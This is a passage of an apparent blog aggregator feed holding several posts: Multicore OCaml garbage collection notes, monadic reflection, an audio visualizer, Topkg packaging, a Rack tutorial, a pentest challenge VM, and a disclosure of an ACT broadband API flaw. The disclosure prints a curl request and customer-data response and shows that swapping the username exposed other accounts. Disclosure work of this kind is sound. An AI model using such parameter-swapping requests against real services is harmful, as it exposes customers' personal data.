work.\nSlidedeck\n(The interactive slide viewer from the original post is omitted here; the notes below annotate the slides in order, and some notes begin mid-sentence where they continue text on a slide.)\n\nMulticore OCaml project is led from OCaml Labs within the University of Cambridge. Stephen Dolan began the project while procrastinating on writing up his dissertation. Hurray to that!\n\nfibers. The unit of parallelism is a domain, which maps to kernel threads. Many kernel threads may service a particular domain, but only one of those kernel threads ever runs OCaml code. A typical program is expected to have a large number of fibers mapped over a few domains. In this talk, I provide an overview of the Multicore OCaml GC design, with a few deep dives into some of the interesting and novel techniques.\n\nroots of the program state, i.e., the current stack and registers, and perform a depth-first traversal through the object graph. Any unreachable objects are garbage and they can be reclaimed.\n\nTri-colour marking is a standard marking algorithm. During marking, the objects are in one of three states: white (unmarked), grey (marking) and black (marked).\n\nmark stack. Subsequently, objects are popped off the mark stack, all of their white children are marked, and the object is marked black. We have the invariant that a black object does not point to a white object. This is called the tri-colour invariant. The figure shows the state when object A and its children have been marked (hence, A is black), and object B has been marked grey and is on the mark stack.\n\nall the allocated objects, and marks any object still white as free space that can subsequently be reused.
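To make the colour transitions concrete, here is a toy model of tri-colour marking with an explicit mark stack. This is my own Python illustration of the algorithm described above, not code from the OCaml runtime:\nWHITE, GREY, BLACK = 'white', 'grey', 'black'\n\nclass Obj:\n    def __init__(self, name, children=()):\n        self.name = name\n        self.children = list(children)\n        self.colour = WHITE\n\ndef mark(roots):\n    stack = []\n    for r in roots:                # roots: current stack, registers, ...\n        if r.colour == WHITE:\n            r.colour = GREY        # grey = discovered, on the mark stack\n            stack.append(r)\n    while stack:\n        obj = stack.pop()\n        for c in obj.children:     # grey all white children first, so that\n            if c.colour == WHITE:  # a black object never points to white\n                c.colour = GREY\n                stack.append(c)\n        obj.colour = BLACK\n\ndef sweep(heap):\n    # the sweeper visits every allocated object; whatever is\n    # still white is unreachable and its space can be reused\n    return [o for o in heap if o.colour != WHITE]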
A nice aspect of copying collection for\nminor GC is that only the live objects need to be scanned, unlike mark and sweep\ncollection where the sweeper needs to examine every allocated object. Given the\ngenerational hypothesis, we will not examine most of the objects in the minor\nheap. As a data point, the minor GC survival rate while compiling the OCaml\ncompiler is around 10%.\n\n\n\n  \n  \n  \n  \nwrite barrier that records such\npointers in an auxiliary data structure called the remembered set. \n\n\n\n  \n  \n  \nB to the\nblack object C...\n\n\n\n  \nA to B.\nIf we perform a major GC now, \n\n\n\n  \nA will be eventually marked as black. But\nthe white object B is only pointed to by\nthe black object C, which will not be\nmarked, \n\n\n\n  \n  \n  \n  \nB from being GCed. The insertion barrier is said to preserve\nstrong tri-colour invariant: A black object never points to a white\nobject. \n\n\n\n  \nC to B. \n\n\n\n  \nA to\nthe white B is deleted, B is marked. This prevents B from being GCed. The deletion barrier\npreserves weak tri-colour invariant: for any white object pointed to by\nblack object, there exists some grey object from which through a series of white\nobjects that white object is reachable.\n\n\n\n  \nr if\nboth r and x are in the major heap. \n\n\n\n  \nDomain.spawn forks off a\nnew domain to run the thunk in parallel with the calling domain. It is\nreasonable to expect that most of the objects in the minor heap are in fact local\nto the domain which allocated the object, and are never shared between domains.\nHence, it is desirable to collect each domain's young garbage independently\nwithout having to synchronize all of the domains. \n\n\n\n  \n  \nPOPL'93\npaper, Doligez and Leroy built a concurrent garbage collector for concurrent\ncaml light which used domain local heaps. In their paper, the heap invariants\nimposed are that there are no pointers between the local heaps and the major\nheap does not point to any minor heaps. \n\n\n\n  \n  \n  \n  \nMarlow\nand Peyton Jones evaluated a local heap design with similar weaker heap\ninvariants for GHC Haskell.\n\n\n\n  \n  \n0xPQRS. In OCaml, integer values are\nrepresented by tagging the least significant bit to be 1. Hence, in this\nexample, integers have low bit of S to be\n1. Minor heap values have PQ to be 42, and R \ndetermines the domain. \n\nWe can implement the read barrier check by comparing the given address with an\naddress from the minor heap. Luckily, we have such an address handily available\nin the register -- the allocation pointer. On amd64, the allocation\npointer is in register r15.\n\n\n\n  \nrax register. At\nthe end of this sequence of instructions, if none of the enabled bits in 0xff01 are set in rax, then zero flag will be set, and we know\nthat the value is not a pointer into a foreign minor heap. Let's see how this\nworks for the different cases.\n\n\n\n  \n  \nPQ bits will different between r15 and rax. Hence, zero flag will not be set.\n\n\n\n  \nPQR will be the same. Hence, the subtraction\nunderflows and sets all the bits in PQ.\nHence, the zero flag will not be set.\n\n\n\n  \n \nIn the case of an address in foreign minor heap, the bits PQ will be the same. The bits in R will be different, and S will be zero in both values. After xoring,\nR will be non-zero and importantly, the\nrest of the bits are zero. Subtracting 1 from a non-zero value does not\nunderflow, hence the rest of the bits remain zero. 
Now, the zero flag will be\nset after the test, and we know that the pointer is in the foreign minor heap.\n\n\n\n  \nAbstract_tag where a C library may map a C\nstructure onto the OCaml heap and modify it transparently without the knowledge\nof the write barrier. Hence, the copies may go out of sync.\n\n\n\nWe may instead move the object to the major heap and perform a minor GC to fix\nany references to the promoted objects. However, this scheme suffers from false\npromotions and long pauses during reads. To avoid false promotions, we may\npromote the object and scan the roots and the entire minor heap to fix any\nreferences to promoted objects. However, one needs to scan all the objects in\nthe minor heap, which even the minor collection doesn't have to do.\n\n\n\n\n  \n  \npromotion_set, which\nis only scanned during the promotion process. Otherwise, we move the object\nclosure and perform a minor GC.\n\n\n\n  \n  \nVery\nConcurrent Mark-&-Sweep Garbage Collector (VCGC) design from the Inferno\nproject which allows the mutator, marker and the sweeper threads to run\nconcurrently. In VCGC design, there is a small stop-the-world phase at the end\nof a cycle where the threads agree on the end of the current major GC cycle and\nthe beginning of the next one. Multicore OCaml's major GC is mostly concurrent\nmark and sweep where the stop-the-world phase might need to do a small fraction\nof major GC work left over before the end of the cycle, not unlike the VCGC\ndesign with many mutators i.e., parallel execution.\n\n\n\n  \nMarked, Unmarked, Garbage and Free. The domains alternate between running the\nmutator and performing GC work. The GC thread performs a depth-first traversal\nof the heap. If it finds an Unmarked\nobject, it changes its colour to Marked\nand pushes the object into a domain-local mark-stack. On the other hand, if it\nfinds a Garbage object, it marks it as\nFree and adds it to the free list. Since\nmultiple GC threads operate on the heap simultaneously, marking is racy but\nidempotent. In particular, there is no synchronization for marking the objects.\n\n\n\n  \nUnmarked is considered Garbage. Anything that is Marked becomes Unmarked for the next cycle. Garbage objects are considered Marked, but at the end of the major GC, all\nGarbage objects have been marked Free. Hence, no objects fall into this\ncategory. Anything that is marked Free\nstill remains Free. This concludes the\ndiscussion on parallelism.\n\n\n\n  \n  \nremembered fiber set. \n\n\n\n  \n  \nx to\nr, instead of promoting fiber f, \n\n\n\n  \nx in the remembered set.\n\n\n\n  \nf,  \n\n\n\n  \n  \n  \n  \n  \n  \nBlack. And in order to prevent racy\naccess, the fiber is locked while marking. If the GC thread holds the lock on a\nfiber and a mutator tries to context switch to it, the mutator blocks until the\nfiber is marked. If the GC thread loses the race, it can safely skip marking the\nfiber.\n\n\n\n  \n x.length) {slideIndex = 1}    \n  if (n \n\nFurther Reading\nMulticore OCaml\n    \nConcurrency\n        \nEffective Concurrency with Algebraic Effects\nPearls of Algebraic Effects and Handlers\nExamples\nand more papers\nWiki\nGC bibliography\n    \nDamien Doligez and Xavier Leroy. “A concurrent, generational garbage collector for a multithreaded implementation of ML.” POPL 1993.\nSimon Marlow and Simon Peyton Jones. “Multicore garbage collection with local heaps.” ACM SIGPLAN Notices. Vol. 46. No. 11. 
ACM, 2011\nTodd Anderson, “Optimizations in a private nursery-based garbage collector”, ISMM, 2010.\nKC Sivaramakrishnan, Lukasz Ziarek, Suresh Jagannathan, “A Coherent and Managed Runtime for ML on the SCC”, MARC, 2012.\nLorenz Huelsbergen and Phil Winterbottom. “Very concurrent mark-&-sweep garbage collection without fine-grain synchronization.” ISMM 1998.\nScott Schneider, Christos D. Antonopoulos, and Dimitrios S. Nikolopoulos. “Scalable, locality-conscious multithreaded memory allocation.” ISMM 2006.",[],{"slug":2605,"title":2606,"link":2607,"pubDate":2608,"contentSnippet":2609,"tags":2610,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"monadic-reflections-on-concurrency","(Monadic) Reflections on Concurrency","https:\u002F\u002Fkcsrk.info\u002Fmulticore\u002Freflection\u002Fmonads\u002Feffects\u002F2017\u002F06\u002F13\u002Fmonadic-reflections-on-concurrency\u002F","2017-06-13T12:13:00.000Z","We recently published a paper on concurrent system programming with effect\nhandlers. In this paper, we show\nthat with the help of effect handlers, we could express in direct-style,\nvarious interactions of a concurrent program with OS services that typically\nrequire callbacks. The question is what do we do about legacy code that uses\nmonadic concurrency libraries such as Lwt and Async. Surely a wholesale rewrite\nof all Lwt and Async code is a no go. This post is an exploration of some ideas\nto make Lwt and Async compatible with direct-style code.\nMonadic Reflection\nAndrzej Filinski introduced monadic reflection in his paper Representing\nMonads,\ncharacterizing the relationship between monadic style and continuation-passing\nstyle. Practically, in a language like multicore OCaml with native support for\ndelimited continuations, any monadic style program can also be written in\ndirect-style. Filinski introduces two operators to transform between the two\nstyles:\n\n\nreify transforms a direct-style computation to a monadic one and reflect\ngoes the other way. In multicore OCaml, we can implement monadic reflection for\nany monad as1:\n\n\nWe introduce an effect E which is parameterized with the monadic computation.\nWhen this effect is performed, it returns the result of performing this monadic\ncomputation. reify wraps the direct-style computation with an effect handler\nthat handles E m and binds the monadic computation m to the rest of the\ndirect-style computation. reflect simply performs the given monadic\ncomputation wrapped in E. The idea here is that whenever the monad does\nanything interesting, we perform the effect E which delegates the handling of\ninteresting monadic behavior to the effect handler.\nMonadic to Direct\nWe implement chameneos-redux benchmark\nfrom the computer language benchmarks game in direct-style and using concurrency\nmonad. The benchmark is intended to evaluate the cost of context switching\nbetween tasks. The source code is available\nhere\nin a single-self contained file. We implement both versions as functors\n(direct-style is ChameneosD (S : SchedD) (M : MVarD) and monadic-style is\nChameneosM (S : SchedM) (M : MVarM)) parameterized by a scheduler and an MVar\nimplementation. 
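The reify\u002Freflect implementation the post refers to was an embedded snippet that did not survive this feed. As a rough reconstruction, here is what it can look like in current OCaml 5 effect-handler syntax (rather than the 2017 Multicore branch's syntax); the module names are invented, but the shape follows the prose above: an effect E carrying a monadic computation, handled with bind.\n\nmodule type Monad = sig\n  type 'a t\n  val return : 'a -> 'a t\n  val bind : 'a t -> ('a -> 'b t) -> 'b t\nend\n\nmodule Reflection (M : Monad) = struct\n  (* Performing E m asks the enclosing handler to run the monadic computation m. *)\n  type _ Effect.t += E : 'a M.t -> 'a Effect.t\n\n  (* Direct-style view of a monadic computation. *)\n  let reflect (m : 'a M.t) : 'a = Effect.perform (E m)\n\n  (* Monadic view of a direct-style computation: handle E with bind and\n     resume the captured continuation with the result. *)\n  let reify (type r) (f : unit -> r) : r M.t =\n    let open Effect.Deep in\n    match_with f ()\n      { retc = M.return;\n        exnc = raise;\n        effc = (fun (type a) (e : a Effect.t) ->\n          match e with\n          | E m -> Some (fun (k : (a, _) continuation) ->\n              M.bind m (fun x -> continue k x))\n          | _ -> None) }\nend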
The signatures of direct and monadic style scheduler and MVars\nare:\n\n\nUsing monadic reflection on the monadic scheduler SchedM and MVar MVarM\nimplementations, we can instantiate the direct-style functor ChameneosD:\n\n\nWe can even instantiate the direct-style functor ChameneosD with Lwt with no\nextra effort:\n\n\nThus, monadic reflection lets you utilize Lwt and Async in direct-style.\nImportantly, one gets back backtraces and the use of raise and try...with\nfor exception handling.\nDirect to Monadic\nLwt and Async libraries provide strong guarantees on task interleavings. In\nparticular, both libraries provide automatic mutual exclusion – context\nswitches between tasks only occur at bind points. In other words, any\nnon-monadic functions, such as calls to standard library functions, are\nguaranteed not to context switch. With effect handlers, this is no longer the\ncase since effects are not tracked in the types in multicore OCaml.\nWe can recover the type level marker with a shallow embedding:\n\n\nAnd we can go back to direct-style using monadic reflection:\n\n\nPerformance\nWe compared the performance of different configurations for running\nchameneos-redux for 1 million iterations:\n  \nThe results show that monadic reflection has around 9% overhead on average over\nthe baseline monadic implementations. This is a small price to pay for the\nadvantage for programming in direct-style.\nConclusion\nWe have been prototyping a multicore-capable I\u002FO library for OCaml called\nAeio, with compatibility layer for\nLwt and Async built on top of this library. Monadic reflection and other\ntechniques can help resolve the schism between monadic libraries and\ndirect-style code.\nFootnotes\nThanks to Jeremy Yallop for introducing me to monadic reflection and contributing this implementation. ↩",[],{"slug":2612,"title":2613,"link":2614,"pubDate":2615,"contentSnippet":2616,"tags":2617,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"spectrumyzer-visualization","Building the perfect audio visualization","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2017\u002F05\u002F01\u002Fspectrumyzer-visualization\u002F","2017-05-01T00:00:00.000Z","I made this as my animated wallpaper recently (Click to play\u002Fpause):\n\n\nabove video has a audio component, click at your own peril.\nWhat follows is the story and the tech behind making this.\nThe Wallpaper\nI have a long history of using custom wallpapers. This was my wallpaper from 2014-:\n\nWhen I asked Vikalp to design a new one, I knew I wanted something that\nwas slightly more softer. This is what he came up with, after a few iterations:\n\nThis wasn’t the final iteration, and both of us agreed that there was something missing.\nVisualizations\nI saw a colleague using cava and spent a bit of time trying out different\nvisualization software. The ones that I tried out:\ncava\n  works perfectly with i3, runs on a terminal. I couldn’t get it to work cleanly with transparency. \n  mildrop\n  Winamp’s legacy. This works great for parties, but is not really an everyday-use visualizer. 
\n  spectrumyzer\n  Worked with transparency, but limited to bars visualization.\n\n\nI decided to go ahead with Spectrumyzer (This is the default config):\n\nThe Traffic Jam\nThe very same day, stuck in a traffic jam1, I asked Vikalp for some color ideas on the visualization.\nThe obvious 2 were tried first:\n\n\nIt finally dawned on us to use the light blue variant with padding set to zero:\n\nHere is one showing the actual positioning (set using the offsets):\n\nBezier Curves\nWith the padding set to zero, it already looked great. I ended up using this\nas my wallpaper for the next one week. Vikalp wanted to make the bars\nnon-rectangular, and I spent some time figuring out how to make waveforms using\nbezier curves2. The basic learning from my experiments were:\nCairo has methods for drawing cubic bezier curves.\nCubic bezier curves have 2 control points.\nThe control points must be symmetric (equidistant) as well as parallel to the origin points.\nThe parallel part ensures that the ending and starting line segments are always tangential giving a smooth joining.\nThis is roughly what you want to do when drawing waveforms:\n\nIf you are interested in playing around with Bezier curves, see Animated Bézier Curves. A Primer on Bézier Curves is a math-heavy explanation if you want to read further3.\nThe code I wrote picks the midpoints of the bars and then connects them using bezier curves:\n\n# control point cords\n# Make sure these are symmetric\nc1x = rect_top_mid_x + 16\nc2x = next_rect_top_mid_x - 16\nc1y = rect_top_mid_y\nc2y = next_rect_top_mid_y\n\n\nI also had to make the number of bars configurable (this is default=64, which doesn’t look great):\n\nHere is the complete final result in HD:\n\n\nWhat I learned\nBezier curves are not magic.\nDrawing pixels on screen and filling them was quite easy with Cairo and Python.\nCoding is wizardry. The things that I take for granted every day (take a multi-page website and get useful tabular data out of it, for eg) are unthinkable for most people. The idea of doing water waves was something I knew would be possible before I even looked at the codebase.\nIf you’d like to replicate this setup, or build upon it, here is my spectrum.conf file.\nI also filed a PR (now merged!) to the spectrumyzer project adding support for curve based renders.\nSony World Junction - Where startup ideas are born. ↩\nThe Spectrumyzer codebase turned out to be fairly easy to understand. It was just cairo and pyGTK. ↩\nA Primer on Bézier Curves was published on HN just a few days after I finished this project. ↩",[],{"slug":2619,"title":2620,"link":2621,"pubDate":2622,"contentSnippet":2623,"tags":2624,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"book-review-2016","Book Review (2016)","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2017\u002F04\u002F02\u002Fbook-review-2016\u002F","2017-04-02T00:00:00.000Z","I tweeted this a while back about my reading progress in 2016, and thought I’d do a post about what I read.\nMade a graph of my @goodreads reading progress in 2016. 
I only picked up the pace sometime in May, but managed to read ~10k pages this year.\n\nJanuary 13, 2017\nContinuing with the review tradition from last year, here are the top 3 books that I read in 2016:\nThe Library at Mount Char [review]\nBinti (Hugo winner for Best Novella, SF)\nLolita\nOther books that I enjoyed were “Bands of Mourning”, the 3rd book in Mistborn Era 2, and the Powder Mage Trilogy which I found hard to put down.\nI decided to aim for 36 books in 2016 (as well as 2017 now), and crossed that nicely. I picked 36 because it corresponds to 3 books a month or 1 book every 10 days, which makes for a goal that is easily tracked. I count everything that goodreads might count as a book (which is both good and bad), but I stick to it. Far more important for me would be the page count, which I charted at the end of the year and I read ~830 pages a month, which I’m pretty happy with.\nI’m hoping to read more technical books in 2017, and have made some progress on that front with re-reading SICP.\nIf you are interested in the script that generated the graph, you can find it on github.",[],{"slug":2626,"title":2627,"link":2628,"pubDate":2629,"contentSnippet":2630,"tags":2631,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"act-vulnerability","Vulnerability Report: ACT Corp","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2017\u002F03\u002F26\u002Fact-vulnerability\u002F","2017-03-26T00:00:00.000Z","ACT, for those who don’t know is one of India’s most popular broadband providers.\nThis is a very brief and concise summary.\nACT has a mobile application\nThat allows you to login and check your plan details, data usage etc\nI’ve been wanting to build a command line application that lets me check the balance easily\nI tried scripting their website, but it was too much javascript.\nThe mobile app uses an API to do the same\nThe API happens to have really bad auth\nGot fixed almost 3 months after reporting this.\nRequest\n\ncurl https:\u002F\u002Fmyfibernet.actcorp.in\u002Fapi\u002Fuser\u002Fplandetails -H \"Content-Type: application\u002Fjson\" -H \"Authtoken: 2aee21dfb1ef77707c30f48ccc513ad60b74d1fc6a84d60ecc32323ab5941469\" -H \"Apiversion: 1.0\" -H \"Appversion: 32\" -H \"Devicetype: 1\" -H \"Deviceid: 68590327e3e0ca81\" -H \"Mobilenumber: 9999999999\" -H \"Mid: 8973808103928d98703e65c0106b7a9d4001886234afbc2d7ce6415b75f9c216\" --data '{\"username\":\"11111111\"}'\n\n\nThe API responds back with the following:\n\n{\n  \"code\": 200,\n  \"status\": true,\n  \"message\": \"Success\",\n  \"data\": {\n    \"plan_details\": {\n      \"agreement_info\": {\n        \"agreement_no\": \"XXXXXXXXXX\",\n        \"promotion_code\": \"\",\n        \"package_code\": \"ACTESS01M\",\n        \"package_name\": \"\",\n        \"agreement_startdate\": \"DD\u002FMM\u002FYYYY\",\n        \"expiry_date\": \"\",\n        \"status\": \"\",\n        \"entity_code\": \"[]\",\n        \"subscription_period\": \"[]\",\n        \"payterm\": \"[]\",\n        \"billingcycle_code\": \"[]\",\n        \"contract_type\": \"ISP\",\n        \"outlets\": \"1\",\n        \"service_points\": \"\",\n        \"package_tenure\": int,\n        \"due_date\": \"\"\n      },\n      \"product_info\": {\n        \"product_code\": \"\",\n        \"product_desc\": \"\"\n      }\n    },\n    \"plan_usage_info\": {\n      \"service_id\": \"ACTESS01M\",\n      \"service_name\": \"ACTESS01M\",\n      \"outbyteslimit\": 322122547200,\n      \"outbytesremaining\": 153400581140,\n      \"outbytesused\": 
168721966060\n    },\n    \"bill_info\": {\n      \"accountno\": \"111111112233\",\n      \"subscribername\": \"NAME\",\n      \"phonenumber\": \"PHONENUMBER\",\n      \"address\": {\n        \"line1\": \"YUP\",\n        \"line2\": \"THESE TWO LINES WERE FILLED\",\n        \"line3\": \"\",\n        \"district\": \"AND THIS\",\n        \"city\": \"BANGALORE\",\n        \"state\": \"KARNATAKA\",\n        \"country\": \"India\"\n      },\n      \"billno\": \"10000001111\",\n      \"billdate\": \"DD\u002FMM\u002F2016\",\n      \"account_period\": \"01\u002FMM\u002F2016-30\u002FMM\u002F2016\",\n      \"previous_due\": \"\",\n      \"current_invoice_amt\": \"1234\",\n      \"total_due\": \"0\",\n      \"bill_due_date\": \"15 Nov 2016\"\n    }\n  }\n}\n\n\nSome of these are empty fields, and some values that I didn’t understand I’ve replaced with [].\nThe fun part is that the request is actually a POST and contains the following data:\n{\"username\":\"11111111\"}\nI happen to have friends who also use ACT. I asked around for usernames, and just by changing this one parameter in the request, I could access the complete details of almost everyone else.\nAlmost everyone, because for certain cases, I get a valid empty response. Valid because it has the same schema, but empty because all values are empty strings. Don’t know what that happens consistently only for certain accounts. (One of these was a Hyd account, the other in BLR).\nIf you are interested I’m working on a simple API that lets you access the ACT API to check the same details. It would ask you for an OTP the first time you login, and then cache the credentials to let you check the balance easily.\nI’ve reported this to ACT as soon as I found it. Will disclose after I’ve given them some time!\nUpdate: This was reported and fixed by ACT after I managed to find a contact via an investor (really!).\nTimeline\nDate\n      Details\n    \n29 Nov 2016\n      Vulnerability Identified\n    \n29 Nov 2016\n      Email sent to ACT, no response\n    \n6 Dec 2016\n      Email sent with partial customer details to explain scope of the issue, no response\n    \n8 Dec 2016\n      Reminder sent, no response\n    \n20 Jan 2017\n      Another reminder with a writeup sent. I also set a deadline of 29th January (2 months since first contact). Also got in touch with CERT-IN. No response\n    \n23 Jan 2017\n      Accidentally an investor in ACT saw my tweet and responded over twitter. Send a writeup, along with the suggestion to take down the application\n    \n24 Jan 2017\n      ACT reports issue is fixed. I test and report back as fixed the next day\n    \n26 Mar 2017\n      Report published\n    \nHowever, the huge timeline involved here pretty much guarantees that if you are an ACT customer,\nyour data is out there in the public.",[],{"slug":2633,"title":2634,"link":2635,"pubDate":2636,"contentSnippet":2637,"tags":2638,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"cctc-vm-images","CCTC Challenge VM","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2017\u002F03\u002F25\u002Fcctc-vm-images\u002F","2017-03-25T00:00:00.000Z","This is specifically about the contest held in 2011,\n6 years ago. 
I’ve written about my experience\nduring the contest on this blog.\nMore specifically, Round 2 of the contest was a pentesting\nscenario where we were only provided with a VM image\nand asked to test it and report any vulnerabilities\nthat we found.\nI recently found the VirtualBox images, and thought\nI’d share them as a easy intro to web security.\nInstructions\nReach out to me for the VM image\nHack.\nCredentials are student:student (username:password)\nOpen \u002Fcctc in your browser.\nRules\nOnly application and its serving components can be tested for vulnerabilities. The serving components include\n    \nWebserver\nOperating System\nAny other services\u002Ffiles in the guest machine and guest operating system\nAny vulnerability identified in any component outside the above mentioned ones, will not be used for evaluation\nAll participants should necessarily submit all the exploit codes\u002Fcustom scripts written to identify the vulnerabilities in the system.\nThe deadline for the original challenge was 2 weeks, but you’re free to take as much time as you want. Feel free to publish a list of vulnerabilities you find.\nThe attached spreadsheet provides format of the report, challenges in scope, and the details to be filled out for each vulnerability identified.\nThe tasks to be performed are mentioned in the report. Each task consists of the following sections:\nVulnerability\u002FVulnerabilities - You need to write the description of the vulnerability\nRoot Cause(s) - What is the root cause of the vulnerability?\nApproach adopted (Steps with screenshots) – Write the steps followed to exploit the vulnerability along with screenshot of the final screen and\u002For intermediate steps.\nRemediation with sample code snippet – Write the remediation steps to address this vulnerability. Also, write the sample code if applicable.\nAlso attached is a step by step installation guide for application set-up.\nFew points to be considered:\nChallenges can be attempted and completed in any order.\nOnly the application and its serving components can be tested for vulnerabilities. All other components like VMware, if tested for security issues, would lead to disqualification.\nI will not be responsible for the discovery\u002Fnotification of any zero day vulnerability in any software.  If any zero-day vulnerability is identified, it is the responsibility of the concerned participant to notify the vulnerability to the respective vendor as per vendor’s policy.\nIf you are really interested, you can find a copy of the report\nwe submitted at \u002Freports\u002Fcctc.\nThanks to Harshil and Shobhit for working alongside on this.",[],{"slug":2640,"title":2641,"link":2642,"pubDate":2643,"contentSnippet":2644,"tags":2645,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"building-and-publishing-an-ocaml-package","Building and Publishing an OCaml Package: Q1 2017","https:\u002F\u002Fkcsrk.info\u002Focaml\u002Fopam\u002Ftopkg\u002Fcarcass\u002F2017\u002F03\u002F05\u002Fbuilding-and-publishing-an-OCaml-package\u002F","2017-03-05T13:56:00.000Z","One of the key indicators of maturity of a language ecosystem is the ease of\nbuilding, managing and publishing software packages in that language. OCaml\nplatform has made steady progress in the last few years to this end. While\nOPAM simplified package (and compiler) management,\nthe developing and publishing packages remained a constant pain point. This\nsituation has remarkably improved recently with the\nTopkg and\nCarcass. 
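For readers who haven't seen Topkg: a package's build description lives in a small OCaml script, conventionally pkg\u002Fpkg.ml. A minimal sketch (the package name follows the mergeable-vector example below; the .mllib path is an assumption):\n\n#!\u002Fusr\u002Fbin\u002Fenv ocaml\n#use \"topfind\"\n#require \"topkg\"\nopen Topkg\n\nlet () =\n  (* Describe the package and the artefacts to build and install. *)\n  Pkg.describe \"mergeable_vector\" @@ fun c ->\n  Ok [ Pkg.mllib \"src\u002Fmergeable_vector.mllib\" ]\n\nThe topkg command line tool then drives this description during the tag, distrib and publish steps described below.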
This post provides a short\noverview of my workflow for building and publishing an OCaml package using Topkg\nand Carcass.\nTopkg is packager for distributing OCaml software. It provides an API for\ndescribing rules for package builds and installs. Topkg-care provides the\ncommand line tool topkg with support for creating and linting the\ndistribution, publishing the distribution and its documentation on WWW, and\nmaking the package available through OPAM. Carcass is a library and a command\nline tool for defining and generating the directory structure for the OCaml\npackage. At the time of writing this post, carcass was unreleased.\nWorkflow\nI recently released a package for mergeable\nvectors based on operational\ntransformation. The following describes my workflow to build and publish the\npackage.\nSetup\nInstall topkg-care and carcass:\n\n$ opam install topkg-care opam-publish\n$ opam pin add -kgit carcass https:\u002F\u002Fgithub.com\u002Fdbuenzli\u002Fcarcass\n\n\nDevelop\nCreate the directory structure\n    \n\n  $ carcass body topkg\u002Fpkg mergeable_vector\n\n    \nInit\n    \n\n  $ cd mergeable_vector && git init && git add . && git commit -m \"First commit.\"\n  $ git remote add origin https:\u002F\u002Fgithub.com\u002Fkayceesrk\u002Fmergeable-vector\n  $ git push --set-upstream origin master\n\n    \nDevelop: The mergeable_vector\u002Fsrc directory has the source files. I use\nthis Makefile\nat the root of the package.\nTest the package locally with OPAM\n    \n\n  $ opam pin add mergeable_vector .\n\n    \nPublish\nUpdate the\nCHANGES file for the new release.\nTag the release\n    \n\n  $ topkg tag 0.1.0\n\n    \nBuild the distribution\n    \n\n  $ topkg distrib\n\n    \nPublish the distribution\n    \n\n  $ topkg publish distrib\n\n    \nThis makes a new release on Github.\nPublish the doc\n    \n\n  $ topkg publish doc\n\n    \nThis publishes the documentation on Github.\nMake an OPAM package info and submit it to OPAM repository at opam.ocaml.org.\n    \n\n  $ topkg opam pkg\n  $ topkg opam submit\n\n    \nThis creates a Github PR\nto the opam-repository. Once the\nPR is merged, the package becomes available to the users.",[],{"slug":2647,"title":2648,"link":2649,"pubDate":2650,"contentSnippet":2651,"tags":2652,"maintainerName":1639,"maintainerUsername":1640,"maintainerPhoto":77,"feedUrl":1641},"lets-learn-rack-by-implementing-it-from-scratch-html","Let’s learn rack by implementing it from scratch","https:\u002F\u002Faboobacker.in\u002F2017\u002F02\u002F15\u002Flets-learn-rack-by-implementing-it-from-scratch.html","2017-02-15T19:58:20.000Z","Rack is a framework for ruby web frameworks. If you developed apps in ruby frameworks like rails, hanami, Sinatra, you already used  Rack. Almost all ruby web frameworks use rack under the hood, If you are already familiar with rack then you can skip next step and go to re building  part\nIntroduction To Rack\nRack provides minimalistic API to interact, First let’s have a look at rack\nA rack app is an object which takes request environment hash and provides array of 3 elements the output, rack object should respond to the method call\nThe HTTP response code\nHeaders hash\nresponse body object which responds to each\nThe obvious question here is why does rack says about responding to the particular method. This one of the powerful paradigm available in ruby called duck typing. 
ie rack doesn’t care about the object or it’s implementation as long as it responds to the particular method\nLet’s take a look at a simple example.\nInstall rack\n\n  gem install rack\n\n\ncreate a file with name config.ru\n\n# config.ru\nrun Proc.new { |env| ['200', {'Content-Type' => 'text\u002Fhtml'}, ['Hello World\\'d']] }\n\n\nand run the command rackup\nNow open the browser and vist localhost:9292\nCongratulations !, You just made a rack app with just a single line\nNow let’s have look at the above example\nWe have a proc object which responds to call method. 200as status  code  , an array consist of\n{'Content-Type' => 'text\u002Fhtml'} as Response header\nand\n['Hello World \\'d'] as body\nSince rack do not care about the kind of rack object, we can do the same using class or an object\n\n\nclass SuperCoolApp\n  def call(env)\n    ['200', {'Content-Type' => 'text\u002Fhtml'}, ['Hello World\\'d']]\n  end\nend\nrun SuperCoolApp\n\n\n\n\nclass CoolApp\n  def self.call(env)\n    ['200', {'Content-Type' => 'text\u002Fhtml'}, ['Hello World\\'d']]\n  end\nend\n\nrun SuperCoolApp.new\n\n\nBut this doesn’t do anything interesting, this will just display Hello World for all requests . Because we were returning same output without even considering the parameter env . Let’s have a look into by returning env hash as output\n\nclass CoolApp\n  def self.call(env)\n    ['200', {'Content-Type' => 'text\u002Fhtml'}, [env.inspect]]\n  end\nend\n\n\n\nNow run rackup and goto localhost:9292\u002Fhello\u002Fworld\nOutput will be something like this\n\n{\"rack.version\"=>[1, 3], \"rack.errors\"=>#>>, \"rack.multithread\"=>true, \"rack.multiprocess\"=>false, \"rack.run_once\"=>false, \"SCRIPT_NAME\"=>\"\", \"QUERY_STRING\"=>\"\", \"SERVER_PROTOCOL\"=>\"HTTP\u002F1.1\", \"SERVER_SOFTWARE\"=>\"puma 3.6.0 Sleepy Sunday Serenity\", \"GATEWAY_INTERFACE\"=>\"CGI\u002F1.2\", \"REQUEST_METHOD\"=>\"GET\", \"REQUEST_PATH\"=>\"\u002Fhello\u002Fworld\", \"REQUEST_URI\"=>\"\u002Fhello\u002Fworld\", \"HTTP_VERSION\"=>\"HTTP\u002F1.1\", \"HTTP_HOST\"=>\"localhost:9292\", \"HTTP_CONNECTION\"=>\"keep-alive\", \"HTTP_UPGRADE_INSECURE_REQUESTS\"=>\"1\", \"HTTP_USER_AGENT\"=>\"Mozilla\u002F5.0 (X11; Linux x86_64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F54.0.2840.71 Safari\u002F537.36\", \"HTTP_ACCEPT\"=>\"text\u002Fhtml,application\u002Fxhtml+xml,application\u002Fxml;q=0.9,image\u002Fwebp,*\u002F*;q=0.8\", 